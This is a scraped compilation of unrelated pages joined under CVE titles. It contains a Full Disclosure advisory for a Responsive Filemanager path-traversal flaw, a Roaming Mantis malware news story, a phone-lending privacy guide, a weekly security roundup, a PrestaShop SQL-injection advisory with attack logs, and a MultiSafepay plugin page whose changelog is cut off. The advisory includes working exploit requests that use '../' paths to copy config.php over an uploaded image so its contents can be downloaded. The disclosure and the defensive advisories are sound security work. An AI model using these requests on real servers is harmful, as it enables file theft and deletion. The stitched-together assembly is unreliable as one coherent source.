A vulnerability was found in Tecrail Responsive Filemanger up to 9.10.x and classified as critical. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 9.11.0 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion**

_From_: Wiswat A <wiswat.a () gmail com>  
_Date_: Wed, 8 Feb 2017 00:28:23 +0700  

\[+\] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File
Disclosure/Deletion
\[+\] Date: 7 Feb 2017
\[+\] Vulnerability and Exploit Author: Wiswat Aswamenakul
\[+\] Vendor Homepage: http://www.responsivefilemanager.com/
\[+\] Affected version: only tested on 9.11.0 and 9.7.3 (other versions
might be affected)
\[+\] Tested on: Ubuntu 14.04, PHP 5.5.9
\[+\] Category: webapps

\[+\] Description
Responsive filemanger is a PHP based file manager that make use of AJAX
technology. It has various useful features. One of them is copy/cut and
paste files. However, the copy/cut feature does not santize file name
that will be copied/cut. Therefore, it is possible for attackers to
copied/cut any files including PHP files and paste them to overwrite
existing image files. Then, the attackers could download the overwritten
image files to read the content of the copied/cut files. Moreover, for
the cut feature, it can cause the original files to be deleted as well.

\[+\] Exploit
1. Upload a normal image file (jpg, png, gif) to a server
2. Right click at any files, select copy and capture the request with
Burp Suite (or any local proxy)
3. Change parameter "path" to any file name that we would like to
download, for example, path=../filemanager/config/config.php

###
POST /fm/filemanager/ajax\_calls.php?action=copy\_cut HTTP/1.1
Host: 192.168.1.128
Content-Length: 53
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=%2F&5869110e2a073
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=../filemanager/config/config.php&sub\_action=copy
###

4. Go to any sub directory, right click at any files, intercept the
request with burp, select "Paste to this directory"
5. Change parameter "path" to the image file uploaded in step 1, for
example, path=subdir/size.png

###
POST /fm/filemanager/execute.php?action=paste\_clipboard HTTP/1.1
Host: 192.168.1.128
Content-Length: 20
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=subdir%2F&5869110f9a268
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=subdir/size.png
###

6. Download the image file uploaded in step 1, it will contain content
of the file specified in step 3

\[+\] Note (about another issue I found)
During this report, I found another separated issue with the attack
filtering that only check for "../" but not "..\\" which can be used to
bypass all filters if the application runs on Windows server and reported
the issue to the owner as well. However, I found out that this issue was
found by a guy from hacktizen and detailed in following blog post
http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
So, the credit goes for the guy who firstly reported. Perhaps, the guy from
hackitizen did not contact the owner of responsive filemanger or there are
any problems with communication. Therefore, the issue remains unresolved.

\[+\] Timeline
- 02/01/2017: Contact Owner
- 05/02/2017: Patched version is available
- 07/02/2017: Public Advisory

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion** _Wiswat A (Feb 07)_

CVE-2017-20145: Full Disclosure: Responsive Filemanger <= 9.11.0

The mobile threat campaign tracked as Roaming Mantis has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries.
No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week.
Attack chains involving Roaming

The mobile threat campaign tracked as **Roaming Mantis** has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries.

No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week.

Attack chains involving Roaming Mantis, a financially motivated Chinese threat actor, are known to either deploy a piece of banking trojan named MoqHao (aka XLoader) or redirect iPhone users to credential harvesting landing pages that mimic the iCloud login page.

"MoqHao (aka Wroba, XLoader for Android) is an Android remote access trojan (RAT) with information-stealing and backdoor capabilities that likely spreads via SMS," Sekoia researchers said.

It all starts with a phishing SMS, a technique known as smishing, enticing users with package delivery-themed messages containing rogue links, that, when clicked, proceed to download the malicious APK file, but only after determining if a victim's location is within French borders.

Should a recipient be located outside France and the device operating system is neither Android nor iOS – a factor ascertained by checking the IP address and the User-Agent string – the server is designed to respond with a "404 Not found" status code.

"The smishing campaign is therefore geofenced and aims to install Android malware, or collect Apple iCloud credentials," the researchers pointed out.

MoqHao typically uses domains generated through the dynamic DNS service Duck DNS for its first-stage delivery infrastructure. What's more, the malicious app masquerades as the Chrome web browser application to trick users into granting it invasive permissions.

The spyware trojan provides a pathway window for remote interaction with the infected devices, enabling the adversary to stealthily harvest sensitive data such as iCloud data, contact lists, call history, SMS messages, among others.

Sekoia also assessed that the amassed data could be used to facilitate extortion schemes or even sold to other threat actors for profit. "more than 90.000 unique IP addresses that requested the C2 server distributing MoqHao," the researchers noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Roaming Mantis Financial Hackers Targeting Android and iPhone Users in France

The next time someone wants to borrow your device to make a call or take a picture, take these steps to protect your privacy.

From the nephew who wants to play games for a few minutes, to the friend who wants to see your vacation snaps, to the stranger who needs to make a call, there are going to be people who want to borrow your phone.

That's quite a privacy and security risk if you think about everything that your phone gives you access to: social media profiles, banking details, instant messenger conversations, photos and videos that you'd rather the world didn't see, and so on.

However, there are ways to hand over your phone to someone else without having to worry about what they might get up to on it. You just need to make sure that you've taken a few precautions before the exchange takes place.

iPhone

Guided Access is built into iOS.

Apple via David Nield

(Apple via David Nield)

The feature you need to know about on the iPhone is called Guided Access, and you can enable it by opening up iOS Settings and choosing **Accessibility** and **Guided Access**. Turn the **Guided Access** toggle switch on and the feature is ready to go—just make sure you use **Passcode Settings** to set a passcode to protect Guided Access mode.

To actually turn Guided Access on, you need to triple-tap the home button if your iPhone has one, or the side button if it doesn't. You can then tap **Options** to configure how Guided Access is going to work: You're able to restrict access to the volume buttons, for example, and the software keyboard. You can even turn off touchscreen functionality and put a limit on Guided Access mode. Tapping **Start** launches Guided Access.

Whoever is using the iPhone is then locked into the current app, so you need to open up the app in question—the Phone app, a particular game, or whatever it is—before you triple-tap the button on your device to launch Guided Access. You get out of Guided Access with another triple-tap of the same button, at which point you'll need the passcode that you set at the start.

The idea is that without the passcode, the person using your iPhone can't get out of the app you've put them in—there's no way to switch apps, open up the Control Center, or even turn the phone off. It's worth being aware of the app that they're in, though, and what they can do inside that app: If you're showing someone your photos, they'll be able to access all of them.

One extra option in the Photos app is to hide photos and videos by opening them, tapping the share button (bottom left), and choosing **Hide**. This hides these pictures and clips in a special Hidden folder. They won't be visible in normal view in the Photos app, and they won't appear in searches, but the person borrowing your smartphone can still get at them by choosing **Hidden** from the **Albums** tab.

Android

Apps can be pinned inside Android.

Google via David Nield

If you're using an Android device, you can take advantage of a feature similar to Guided Access on iOS. It's called App Pinning, and again the idea is that the person borrowing your phone is limited to one app. They're not able to get to another app or access the phone's settings without a PIN code set by you.

There are certain software variations among Android phone makers when it comes to finding and enabling App Pinning, but you should be able to find it without too much trouble. On the stock version of Android that Google puts in its Pixel phones, you can enable it by going to the main Android Settings menu, then choosing **Security**, **Advanced Settings** and **App Pinning**.

Turn on the **Use App Pinning** toggle switch, and make sure that **Ask for PIN Before Unpinning** is enabled as well—this prevents everyone but you from switching apps. To find the app you want to pin, swipe up and hold from the bottom of the screen until you see thumbnails of your recently used apps. Find the one you want, tap the app icon at the top, and choose **Pin** from the drop-down menu. 

To get out of app pinning, swipe up and hold from the bottom of the screen again. The phone will be locked, and your PIN code will be required to regain access and move between apps. Assuming that the person borrowing your phone doesn't know your PIN, you'll be able to keep them in one app.

Like Apple Photos, Google Photos can also hide photos and videos, which can help if someone is browsing through your pictures. Open an image or clip, tap the three dots (top right), then choose **Move to Locked Folder**—the photos and videos that you send here can't be accessed without unlocking your phone first, which will require a PIN, a fingerprint scan, or a face scan, depending on how you've set it up.

How to Safely Lend Someone Else Your Phone

Plus: The FCC cracks down on car warranty robocalls, Thai activists get targeted by NSO's Pegasus, and the Russia-Ukraine cyberwar continues.

As the United States midterm elections near, lawmakers and law enforcement officials are on high alert about violent threats targeted at election officials across the country—domestic threats that have taken first billing over foreign influence operations and meddling as the primary concern for the 2022 elections. In another arena, though, Congress is making progress on generating bipartisan support for sorely needed and overdue privacy legislation in the form of the American Data Privacy and Protection Act.

Iranian women’s rights activists sounded the alarm this week that Meta has not been responsive to their concerns about targeted bot campaigns flooding their Instagram accounts during a crucial moment for the country’s feminist movement. And investigators looking at attacks on internet cables in Paris have still not determined who was behind the vandalism or what their motive was, but new details have emerged about the extent of the sabotage, making the situation all the more concerning and intriguing. 

The ACLU released documents this week that detail the Department of Homeland Security’s contracts with phone-tracking data brokers who peddle location information. And if you’re worried about Big Brother snooping on your reproductive data, we have a ranking of the most popular period-tracking apps by their data privacy protections. 

And there’s more. Each week we round up the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there!

The Department of Homeland Security Inspector General told the Secret Service on Thursday to halt its investigation into the deletion of January 6 insurrection-related text messages because of an “ongoing criminal investigation” into the situation. Secret Service spokespeople have said conflicting things: that data on the phones was erased during a planned phone migration or factory reset, and that the erased messages were not relevant to the January 6 investigation. The Secret Service said it provided agents with a guide to backing up their data before initiating the overhaul process, but noted that it was up to the individuals to complete this backup. 

Zero Day spoke to Robert Osgood, director of the forensics and telecommunications program at George Mason University and a former FBI digital forensics examiner, about the situation. “Osgood said that telling agents to back up their own phones ‘makes absolutely no sense’— particularly for a government agency engaged in the kind of work the Secret Service does and required to retain records. The agency is not only charged with protecting the president, vice president and others, it also investigates financial crimes and cybercrime,” reports Zero Day author Kim Zetter. “I’m pro-government, and \[telling agents to back up their own phones\] sounds strange,” Osgood told Zetter. “If that did happen, the IT manager that’s responsible for that should be censured. Something should happen to that person because that’s one of the dumbest things I’ve ever heard in my life.'”

The Federal Communications Commission’s Robocall Response Team said on Thursday that it is ordering phone companies to block robocalls that warn about expiring car warranties and offer renewal deals. The FCC said that the calls, which are familiar to people around the US, have come from “Roy Cox Jr., Aaron Michael Jones, their Sumco Panama companies, and international associates.” Since 2018 or possibly earlier, their operations have resulted in more than 8 billion prerecorded message calls to Americans, the FCC said. “We are not going to tolerate robocall scammers or those that help make their scams possible," FCC chairperson Jessica Rosenworcel said in a statement. “Consumers are out of patience and I’m right there with them.”

After Apple warned a number of Thai activists and their associates in November that their devices might have been targeted with NSO Group’s notorious Pegasus spyware, a number of them reached out to human rights groups and researchers who established a broader picture of a campaign in Thailand. In all, more than 30 Thai victims have been identified. The targets worked with the local human rights group iLaw, which found that two of its own members had been victims of the campaign, as well as University of Toronto’s Citizen Lab and Amnesty International. The researchers did not provide attribution for who was behind the Pegasus campaigns, but found that a lot of the targeting occurred in the same general time when the targets were participating in protests against government policies.

Google’s Threat Analysis Group reported this week that it has seen Russia’s digital meddling continue apace, both in Ukraine as the Kremlin’s invasion rages on and in Eastern Europe more broadly. TAG detected the Russia-linked hacking group Turla attempting to spread two different malicious Android apps through sites that masqueraded as being Ukrainian. The group tried to market the apps by claiming that downloading them would play a role in launching denial of service attacks on Russian websites, an interesting twist given the civilian efforts in Ukraine to mount cyberattacks against Russia. TAG also detected activity from other known Russian hacking groups that were exploiting vulnerabilities to target Ukrainian systems and launching disinformation campaigns in the region.

Ukrainian officials also said this week that Russia had conducted an attack on Ukraine’s TAVR Media, hacking nine popular radio stations to spread false information that Ukrainian President Volodymyr Zelensky was in intensive care because of a critical ailment. The broadcast further claimed that Ruslan Stefanchuk, chairperson of the Verkhovna Rada, was in command in Zelensky’s stead. TAVR put out a statement on Facebook saying that the broadcasts did “not correspond to reality.” And Zelensky posted a video on his Instagram attributing the attack to Russia and saying that he is in good health.

The January 6 Secret Service Text Scandal Turns Criminal

PrestaShop 1.6.0.10 through 1.7.x before 1.7.8.2 allows remote attackers to execute arbitrary code, aka a "previously unknown vulnerability chain" related to SQL injection, as exploited in the wild in July 2022.

Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites. For details, please read the entire article.

**What’s happening**

The maintainer team has been made aware that malicious actors are exploiting a combination of known and unknown security vulnerabilities to inject malicious code in PrestaShop websites, allowing them to execute arbitrary instructions, and potentially steal customer’s payment information.

While investigating this attack, we found a previously unknown vulnerability chain that we are fixing. At the moment, however, we cannot be sure that it’s the only way for them to perform the attack. To the best of our understanding, this issue seems to concern shops based on versions 1.6.0.10 or greater, subject to SQL injection vulnerabilities. Versions 1.7.8.2 and greater are not vulnerable unless they are running a module or custom code which itself includes an SQL injection vulnerability. Note that versions 2.0.0~2.1.0 of the Wishlist (blockwishlist) module are vulnerable.

**How the attack works**

The attack requires the shop to be vulnerable to SQL injection exploits. To the best of our knowledge, the latest version of PrestaShop and its modules are free from these vulnerabilities. We believe attackers are targeting shops using outdated software or modules, vulnerable third-party modules, or a yet-to-be-discovered vulnerability.

According to our conversations with shop owners and developers, the recurring modus operandi looks like this:

1.  The attacker submits a POST request to the endpoint vulnerable to SQL injection.
2.  After approximately one second, the attacker submits a GET request to the homepage, with no parameters. This results in a PHP file called blm.php being created at the root of the shop’s directory.
3.  The attacker now submits a GET request to the new file that was created, blm.php, allowing them to execute arbitrary instructions.

After the attackers successfully gained control of a shop, they injected a fake payment form on the front-office checkout page. In this scenario, shop customers might enter their credit card information on the fake form, and unknowingly send it to the attackers.

While this seems to be the common pattern, attackers might be using a different one, by placing a different file name, modifying other parts of the software, planting malicious code elsewhere, or even erasing their tracks once the attack has been successful.

**What to do to keep your shop safe**

First of all, make sure that your shop and all your modules are updated to their latest version. This should prevent your shop from being exposed to known and actively exploited SQL injection vulnerabilities.

According to our current understanding of the exploit, attackers might be using MySQL Smarty cache storage features as part of the attack vector. This feature is rarely used and is disabled by default, but it can be enabled remotely by the attacker. Until a patch has been published, we recommend physically disabling this feature in PrestaShop’s code in order to break the attack chain.

To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

    if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
        include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
        $smarty->caching_type = 'mysql';
    }
    

**How to tell if you have been affected**

Consider looking at your server’s access log for the attack pattern explained above. This is an example shared by a community member:

    - [14/Jul/2022:16:20:56 +0200] "POST /modules/XXX/XXX.php HTTP/1.1" 200 82772 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
     
    - [14/Jul/2022:16:20:57 +0200] "GET / HTTP/1.1" 200 63011 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
     
    - [14/Jul/2022:16:20:58 +0200] "POST /blm.php HTTP/1.1" 200 82696 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
    

(Note: the vulnerable module’s path has been modified for security reasons)

Be aware that not finding this pattern on your logs doesn’t necessarily mean that your shop has not been affected by the attack: the complexity of the exploit means that there are several ways of performing it, and attackers might also try and hide their tracks.

Consider contacting a specialist to perform a full audit of your site and make sure that no file has been modified nor any malicious code has been added.

**Additional information**

A patch version is currently being tested, and should be released soon.

We would like to take the opportunity to stress out once more the importance of keeping your system updated to prevent such attacks. This means regularly updating both your PrestaShop software and its modules, as well as your server environment.

CVE-2022-36408: Major Security Vulnerability on PrestaShop Websites

Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**About MultiSafepay**  
MultiSafepay is a collecting payment service provider which means we take care of the agreements, technical details and  
payment collection required for each payment method. You can start selling online today and manage all your transactions  
from one place.

**Supported Payment Methods**

Payment methods:  
\* AfterPay  
\* Alipay  
\* American Express  
\* Apple Pay  
\* Bank transfer  
\* Bancontact  
\* Belfius  
\* Betaal per Maand  
\* Dotpay  
\* E-Invoicing  
\* EPS  
\* Giropay  
\* iDEAL  
\* in3  
\* KBC/CBC  
\* Klarna  
\* Maestro  
\* Mastercard  
\* Pay After Delivery  
\* PayPal  
\* Paysafecard  
\* Request to Pay  
\* SEPA Direct Debit  
\* SOFORT Banking  
\* Trustly  
\* Visa

Giftcards:  
\* Baby Cadeaubon  
\* Beauty & Wellness  
\* Boekenbon  
\* Fashioncheque  
\* Fashion Giftcard  
\* Gezondheidsbon  
\* GivaCard  
\* Good4fun Giftcard  
\* Goodcard  
\* Fietsbon  
\* Nationale Tuinbon  
\* Parfum Cadeaukaart  
\* Podium  
\* Sport & Fit  
\* VVV Giftcard  
\* Webshop gift card  
\* Wellness gift card  
\* Wijncadeau  
\* Winkelcheque  
\* YourGift

To use the plugin you need a MultiSafepay account.  
Create an account

**Automatic Installation**

*   Search for the ‘MultiSafepay’ plugin via ‘Add New’ from the WordPress menu
*   Press the ‘Install now’ button

**Manual Installation**

*   Download the plugin from the WordPress Plugin Directory
*   Unzip the downloaded file to a local directory
*   Upload the directory ‘multisafepay’ to /wp-content/plugins/ on the remote server

**Configuration**

*   Activate the ‘MultiSafepay’ plugin via ‘Plugin’ from the WordPress menu
*   Navigate to _WooCommerce_ -> _MultiSafepay Settings_
*   In _Account_ tab, set the API key. Information about the API key can be found on our API key page. Click on _Save changes_ button.
*   Go to _Order Status_ tab and confirm the match between WooCommerce order statuses and MultiSafepay order statuses. Click on _Save changes_ button.
*   Go to _Options_ tab and confirm the settings for each field. Click on _Save changes_ button.
*   Navigate to _WooCommerce_ -> _Settings_ -> _Payments_. Click on the payment methods you would like to offer, check and set or confirm the settings for those been enable. Click on _Save changes_ button.

**How can I install the plugin for WooCommerce?**

*   Installation instruction can be found in our Manual page.

**How can I update the plugin for WooCommerce?**

Before you update the plugin, we strongly recommend you the following:

*   Make sure you have a backup of your production environment
*   Test the plugin in a staging environment.
*   Go to our Manual page, download the plugin and follow the instructions from step 2.

**How can I generate a payment link in the backend of WooCommerce?**

It is possible to generate a payment link when an order has been created at the backend in WooCommerce.  
The customer will receive the payment link in the email send by WooCommerce with the order details. Also the payment link will be added to the order notes.

Please follow these steps:

1.  Login into your backend and navigate to WooCommerce -> Orders -> Add order.
2.  Register the order details as explained in WooCommerce documentation.
3.  In “Order actions” panel; select the option “Email invoice / order details to customer”.
4.  Click on “Create” order button.
5.  An email will be sended to the customer with the details of the order and a payment link to finish the order.
6.  The payment link will be available for the customer in their private account area, in “Orders” section.

**Can I refund orders?**

Yes, you can fully or partially refund transactions directly from your WooCommerce backend for all payment methods, except for Billing Suite payment methods in which it is only possible to process full refunds.  
You can also refund from your MultiSafepay Control

MultiSafe plugin is nice as the plugin shows available currency Based on Geolocation IP.

Smoothless integration of the world's most versatile payment system into Woocommerce

Read all 2 reviews

“MultiSafepay plugin for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    multisafepayplugin

**Release Notes – WooCommerce 4.17.2 (Jul 22st, 2022)****Fixed**

*   PLGWOOS-825: Fix an issue in which some payment methods are not being shown in the checkout, because of the setting field country selector is assuming the wrong value in some cases

**Release Notes – WooCommerce 4.17.1 (Jul 22st, 2022)****Changed**

*   PLGWOOS-817: Improvement in the escaping of the outputs of the settings page

**Release Notes – WooCommerce 4.17.0 (Jul 21st, 2022)****Removed**

*   PLGWOOS-816: Remove validation to check if a gateway is enabled in the merchant account, before activate the WooCommerce payment method
*   PLGWOOS-818: Remove upgrade notice functionality in plugin list page

**Changed**

*   PLGWOOS-817: Improvement in sanitization and validation of the inputs, and escaping the outputs

**Release Notes – WooCommerce 4.16.0 (Jul 20th, 2022)****Added**

*   DAVAMS-490: Add MyBank payment method

**Removed**

*   PLGWOOS-811: Remove download plugin logs button and related methods

**Release Notes – WooCommerce 4.15.0 (May 25th, 2022)****Added**

*   DAVAMS-470: Add terms and conditions checkbox to AfterPay

**Changed**

*   PLGWOOS-805: Declare support for WordPress 6.0

**Release Notes – WooCommerce 4.14.0 (May 19th, 2022)****Added**

*   DAVAMS-476: Add Alipay+

**Changed**

*   PLGWOOS-804: Use default locale if get\_locale returns null to prevent third party plugin errors
*   PHPSDK-93: Upgrade the PHP-SDK dependency to 5.5.0

**Release Notes – WooCommerce 4.13.1 (Mar 23th, 2022)****Added**

*   PLGWOOS-792: Declare support for WordPress 5.9.2 and WooCommerce 6.3.1
*   PLGWOOS-790: Improvement on debug mode, logging the body of the POST notification request

**Fixed**

*   PLGWOOS-791: Fix error when WooCommerce order is not found after receive a valid POST notification

**Release Notes – WooCommerce 4.13.0 (Feb 1st, 2022)****Added**

*   PLGWOOS-770: Add payment component support for payment options: Visa, Mastercard, Maestro and American Express
*   PLGWOOS-774: Add support to process ‘smart\_coupon’ coupons from Smart Coupons third party plugin
*   PLGWOOS-775: Log shopping cart content when debug mode is enabled

**Release Notes – WooCommerce 4.12.0 (Jan 13th, 2022)****Added**

*   PLGWOOS-769: Add new filter ‘multisafepay\_merchant\_item\_id’ to allow third party developers overwrite the merchant\_item\_id property within the ShoppingCart object

**Changed**

*   PLGWOOS-744: Update ‘Betaal per Maand’ default max\_amount value, according with new product rules
*   PLGWOOS-759: Rebrand Sofort payment method

**Release Notes – WooCommerce 4.11.0 (Jan 4th, 2022)****Added**

*   PLGWOOS-745: Add Payment Component

**Changed**

*   PLGWOOS-765: Refactor PaymentMethodsController::generate\_orders\_from\_backend() to work only with one argument and avoiding conflicts with third party plugins
*   PLGWOOS-745: Tokenization now works through the Payment Component

**Fixed**

*   PLGWOOS-763: Fix error on plugin list when application can not connect with wordpress network

**Release Notes – WooCommerce 4.10.0 (Dec 13th, 2021)****Added**

*   PLGWOOS-748: Add PHP-SDK version to system report
*   PLGWOOS-758: Add filter to turn notifications to GET method

**Removed**

*   DAVAMS-460: Remove ING Home’Pay

**Changed**

*   PLGWOOS-695: Replace HTTP Client, use WP\_HTTP instead kriswallsmith/buzz
*   PLGWOOS-749: Replace logo of Bancontact for new one

**Fixed**

*   PLGWOOS-752: Fix missing placeholder for Test API Key input field in settings page

**Release Notes – WooCommerce 4.9.0 (Oct 18th, 2021)****Added**

*   PLGWOOS-715: Add 2 “Generic Gateways” which include a flexible gateway code that allows any merchant to connect to almost every payment method we offer.
*   PLGWOOS-746: Declare support for WordPress 5.8.1 and WooCommerce 5.8.0

**Changed**

*   PLGWOOS-740: Improve the helper text of the Google Analytics ID setting field, adding a link to Documentation Center
*   PLGWOOS-747: Upgrade the PHP-SDK component to 5.3.0

**Fixed**

*   PLGWOOS-739: Fix fatal error related with undefined method when processing orders using iDEAL QR
*   PLGWOOS-743: Fix broken links to Documentation Center in settings page

**Release Notes – WooCommerce 4.8.3 (Sep 6th, 2021)****Fixed**

*   PLGWOOS-737: Fix error related with refunds by updating the PHP-SDK to 5.2.1

**Release Notes – WooCommerce 4.8.2 (Sep 2nd, 2021)****Added**

*   PLGWOOS-730: Declare support for WooCommerce 5.6.0

**Release Notes – WooCommerce 4.8.1 (Aug 9th, 2021)****Fixed**

*   PLGWOOS-727: Show error message from the API in the checkout page, when there is an error on direct transactions

**Release Notes – WooCommerce 4.8.0 (Aug 4th, 2021)****Added**

*   PLGWOOS-723: Declare support for WooCommerce 5.5.2 and WordPress 5.8
*   PLGWOOS-711: Add missing titles in setting pages

**Changed**

*   PLGWOOS-718: Remove PSP ID string when register the transaction ID in WC\_Order->payment\_complete()

**Release Notes – WooCommerce 4.7.0 (Jun 23th, 2021)****Added**

*   PLGWOOS-706: Declare support for WooCommerce 5.4.1

**Changed**

*   PLGWOOS-672: Change notification method from GET to POST by default

**Fixed**

*   PLGWOOS-704: Log errors in the MultiSafepay log file, when processing notifications.

**Release Notes – WooCommerce 4.6.0 (May 19th, 2021)****Added**

*   PLGWOOS-625: Add log section in MultiSafepay settings page
*   PLGWOOS-666: Add MultiSafepay system status section in settings page
*   PLGWOOS-376: Add support to show upgrade notices in plugin list
*   PLGWOOS-657: Add nl\_BE language

**Fixed**

*   PLGWOOS-694: Fix notification for orders fully paid with gift cards
*   PLGWOOS-692: Fix Second Chance within the orderRequest object
*   PLGWOOS-654: Fix the gateway\_id assigned to the properties of each token

**Release Notes – WooCommerce 4.5.1 (Apr 7th, 2021)****Fixed**

*   PLGWOOS-661: Fix payment methods ids to match list of gateway lists keys, which was producing an error to process notification for Sofort payments
*   PLGWOOS-663: Fix stock decreasing error, in relation with Bank Transfer gateway and notification flows

**Release Notes – WooCommerce 4.5.0 (Mar 31th, 2021)****Fixed**

*   PLGWOOS-659: Fix initialization of the plugin on multisite environments in which WooCommerce has been activate network wide

**Added**

*   PLGWOOS-534: Add generic gateway

**Release Notes – WooCommerce 4.4.1 (Mar 25th, 2021)****Fixed**

*   PLGWOOS-653: Fix overwriting initial order status when transaction is initialized

**Release Notes – WooCommerce 4.4.0 (Mar 23th, 2021)****Fixed**

*   PLGWOOS-648: Return 0 as tax rate, if WooCommerce taxes are disabled but tax rules are registered
*   PLGWOOS-647: Add verification to check if the token used in the transaction belongs to the customer

**Added**

*   PLGWOOS-651: Add setting to select type of transaction in SEPA Direct Debit, E-Invoicing, in3, Santander Consumer Finance, AfterPay and iDEAL
*   PLGWOOS-644: Add setting to select type of transaction in Pay After Delivery
*   PLGWOOS-640: Add setting to select type of transaction in Bank Transfer

**Release Notes – WooCommerce 4.3.0 (Mar 18th, 2021)****Fixed**

*   PLGWOOS-626: Fix order not being cancelled when customer cancels the order
*   PLGWOOS-630: Fix include shipping item in full refund of billing suite payment methods

**Added**

*   PLGWOOS-629: Add shipping item to the order request, even if this one is free
*   PLGWOOS-631: Add delivery address in order request even if the shipping amount is 0
*   PLGWOOS-634: Add settings field to redirect to checkout page or cart page on cancelling the order
*   PLGWOOS-635: Add suggestion to set default initial order status for bank transfer to wc-on-hold
*   PLGWOOS-636: Add notification endpoint from version 3.8.0 to process deprecated notifications

**Changed**

*   PLGWOOS-622: Change notification url for all payment methods to a single notification url

**Release Notes – WooCommerce 4.2.2 (Mar 16th, 2021)****Fixed**

*   PLGWOOS-632: Fix undefined method get\_the\_user\_ip
*   PLGWOOS-621: Fix division by zero when fee price is 0

**Release Notes – WooCommerce 4.2.1 (Mar 11th, 2021)****Fixed**

*   PLGWOOS-613: Fix error related with multiple forwarded IPs by updating the PHP-SDK to 5.0.1

**Added**

*   PLGWOOS-398: Add support to change the data in the OrderRequest using WordPress filters

**Changed**

*   PLGWOOS-614: Avoid changing order status if transaction is partially refunded

**Release Notes – WooCommerce 4.2.0 (Mar 9th, 2021)****Changed**

*   PLGWOOS-602: Move invoice and shipped settings field from order status tab to options tab
*   PLGWOOS-602: Remove completed status from order status tab in settings page
*   PLGWOOS-601: Change default status for declined transactions from wc-cancelled to wc-failed

**Fixed**

*   PLGWOOS-599: Fix typo in string message when payment method changes
*   PLGWOOS-598: Replace hardcoded url using plugins\_url function
*   PLGWOOS-605: Fix description of country filter field

**Added**

*   PLGWOOS-603: Add setting field for custom order description
*   PLGWOOS-604: Add forwarded IP to the CustomerDetails object
*   PLGWOOS-597: Support for orders with is\_vat\_exempt
*   PLGWOOS-606: Add chargedback transaction status in plugin settings

**Release Notes – WooCommerce 4.1.8 (Mar 5th, 2021)****Changed**

*   PLGWOOS-593: Register PSP ID in WooCommerce order using order complete payment method
*   PLGWOOS-593: Change notification method on completed status to use $order->complete\_payment()

**Fixed**

*   PLGWOOS-594: Fix Credit Card payment method form, to show description if customer is not logged in

**Release Notes – WooCommerce 4.1.7 (Mar 3th, 2021)****Changed**

*   PLGWOOS-579: Remove warning message on validation, when enabling CREDITCARD gateway

**Fixed**

*   PLGWOOS-584: Fix conflict with third party plugins related with Discovery exception
*   PLGWOOS-585: Set MultiSafepay transaction as shipped or invoiced using order number instead of order id

**Release Notes – WooCommerce 4.1.6 (Mar 2nd, 2021)****Added**

*   PLGWOOS-574: Add locale support

**Changed**

*   PLGWOOS-575: Change settings page capability requirement from manage\_options to manage\_woocommerce

**Fixed**

*   PLGWOOS-580: Show credit card payment method description in checkout
*   PLGWOOS-569: Remove class that trigger validation styles for ideal select in checkout page

**Release Notes – WooCommerce 4.1.5 (Feb 24th, 2021)****Fixed**

*   PLGWOOS-552: Fix product item price with discounts introduced by third party plugins (#252)

**Release Notes – WooCommerce 4.1.4 (Feb 23th, 2021)****Fixed**

